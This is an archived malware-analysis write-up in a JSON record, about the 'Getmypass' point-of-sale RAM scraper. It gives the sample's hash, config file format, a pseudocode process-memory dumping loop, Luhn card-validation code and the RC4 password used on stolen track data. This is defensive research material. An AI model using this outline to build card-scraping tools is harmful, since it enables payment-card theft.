{
	"id": "88e06b6c-d878-4d9e-9918-d0c3c1008964",
	"created_at": "2026-04-06T00:07:02.958845Z",
	"updated_at": "2026-04-10T03:20:36.966481Z",
	"deleted_at": null,
	"sha1_hash": "50e468ea3619fb8818521231f5c16d813c8eccb8",
	"title": "Getmypass Point of Sale Malware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 133511,
	"plain_text": "Getmypass Point of Sale Malware\r\nPublished: 2014-11-26 · Archived: 2026-04-02 11:38:38 UTC\r\nIntroduction\r\nWhile doing some digging recently on VirusTotal I had a rule trigger on what appears to be a new POS malware\r\nfamily.\r\nThe MD5 (1d8fd13c890060464019c0f07b928b1a) is the malware that I will be dissecting in this post.\r\nThe first interesting thing that struck my eye is the incredibly low detection rate which at the time of this writing\r\nwas 0/55.\r\nSecondly (and what may be affecting detection) is that the binary is signed from “Bargaining active” which is\r\ncurrently a valid certificate.\r\nSo digging into the code a bit, this malware appears to do something in common with other POS RAM scrapers.\r\nProcess Dumping\r\nSearching for CC data\r\nhttps://securitykitten.github.io/2014/11/26/getmypass-point-of-sale-malware.html\r\nPage 1 of 5\n\nValidation using Luhn’s algorithm\r\nWriting that to a file\r\nEncrypting / Encoding file\r\nThere doesn’t appear to be any C2 functionality in this particular piece of malware so this is more of a utility than\r\na backdoor. This malware also does not contain code to do any of the following:\r\nLateral movement\r\nCredential harvesting\r\nPushing the harvested data to a non-local file\r\nKeylogging\r\nAnalysis\r\nThe malware will first search for an ini file named 1.ini in the same directory as the malware. Without the ini file\r\nthe malware will exit. Thanks to Josh Grunzweig for pointing out the ini format.\r\n[settings]\r\nproc=notepad.exe\r\ntime=1000\r\ncryp=1\r\nThe cryp argument is responsible for toggling on/off functionality to encrypt the collected CC data with RC4.\r\nThe malware will also create a mutex when running “1yn8RQLkm8”\r\nDiving in head first, the first function that stuck out to me is at loc 0x402360. This function is responsible for\r\niterating over processes, calling OpenProcess, and then ultimately ReadProcessMemory.\r\nVery (very!) rough logic for this would look resemble:\r\nprocs = CreateToolhelp32Snapshot\r\nProcess32FirstW(procs)\r\ndo\r\nOpenProcess\r\nwhile true\r\nif VirtualQueryEx\r\nReadProcessMemory\r\nhttps://securitykitten.github.io/2014/11/26/getmypass-point-of-sale-malware.html\r\nPage 2 of 5\n\nelse\r\nbreak\r\nCloseHandle\r\nwhile Process32NextW\r\nCloseHandle\r\nVirtualFree\r\nMany of the POS ram scrapers will use this same sort of functionality to crawl and enumerate processes. One\r\ndifference is that this malware does use a whitelist (in the ini file) and only dumps processes the user would\r\nspecify.\r\nBelow is a screenshot of the configuration file 1.ini and the encrypted track1 and track2 CC information:\r\nWhen running the malware in a debugger, I posted sample track data into notepad and stepped though execution.\r\nThe malware will locate the notepad process (using the above loop) and then pass those results to a function to\r\nsearch for strings that look like track data. These are then parsed and the results are passed to a function that will\r\nuse the Luhn’s algorithm to process and check for valid numbers. A lookup table is used rather than calculating a\r\ndigital root. This is the same version of the algorithm used in FrameworkPOS and Dexter.\r\n v5 = 0;\r\n v6 = 2;\r\n v7 = 4;\r\n v8 = 6;\r\n v9 = 8;\r\n v10 = 1;\r\n v11 = 3;\r\n v12 = 5;\r\n v13 = 7;\r\n v14 = 9;\r\n v16 = 1;\r\n v15 = 0;\r\n v17 = a2;\r\n while ( 1 )\r\n {\r\n v2 = v17--;\r\nhttps://securitykitten.github.io/2014/11/26/getmypass-point-of-sale-malware.html\r\nPage 3 of 5\n\nif ( !v2 )\r\n break;\r\n if ( v16 )\r\n v4 = *(_WORD *)(a1 + 2 * v17) - 48;\r\n else\r\n v4 = *(\u0026v5 + *(_WORD *)(a1 + 2 * v17) - 48);\r\n v15 += v4;\r\n v16 = v16 == 0;\r\n }\r\n return v15 % 10 == 0;\r\n}\r\nWhich in source code would look more like this\r\nint IsValidCC(const char* cc,int CClen)\r\n{\r\nconst int m[] = {0,2,4,6,8,1,3,5,7,9}; // mapping for rule 3\r\nint i, odd = 1, sum = 0;\r\nfor (i = CClen; i--; odd = !odd) {\r\nint digit = cc[i] - '0';\r\nsum += odd ? digit : m[digit];\r\n}\r\nreturn sum % 10 == 0;\r\n}\r\nOnce the numbers have been validated, they are passed to an RC4 function and written out to rep.tmp and rep.bin\r\nthe RC4 password used is “getmypass”\r\nDisabling the “cryp” option in the config file will write plaintext data to the rep.tmp and rep.bin files\r\nhttps://securitykitten.github.io/2014/11/26/getmypass-point-of-sale-malware.html\r\nPage 4 of 5\n\nFinal Thoughts\r\nTo run this malware successfully the attacker would need several pieces of information:\r\nCredentials\r\nName of the POS executable / service\r\nA method for moving the data out of the network\r\nThis malware seems to be in its infancy. There are debug strings still existent in the malware indicate to me that\r\nthe author is still testing the tool or is still actively developing it.\r\nIt’s important to track tools like this from their very young stages so that researchers can watch them develop and\r\neventually grow into the next big tool. While this isn’t the most advanced POS RAM scraper there is, it’s still\r\ncapable of bypassing all 55 AV’s used to scan it.\r\nSource: https://securitykitten.github.io/2014/11/26/getmypass-point-of-sale-malware.html\r\nhttps://securitykitten.github.io/2014/11/26/getmypass-point-of-sale-malware.html\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://securitykitten.github.io/2014/11/26/getmypass-point-of-sale-malware.html"
	],
	"report_names": [
		"getmypass-point-of-sale-malware.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434022,
	"ts_updated_at": 1775791236,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/50e468ea3619fb8818521231f5c16d813c8eccb8.pdf",
		"text": "https://archive.orkl.eu/50e468ea3619fb8818521231f5c16d813c8eccb8.txt",
		"img": "https://archive.orkl.eu/50e468ea3619fb8818521231f5c16d813c8eccb8.jpg"
	}
}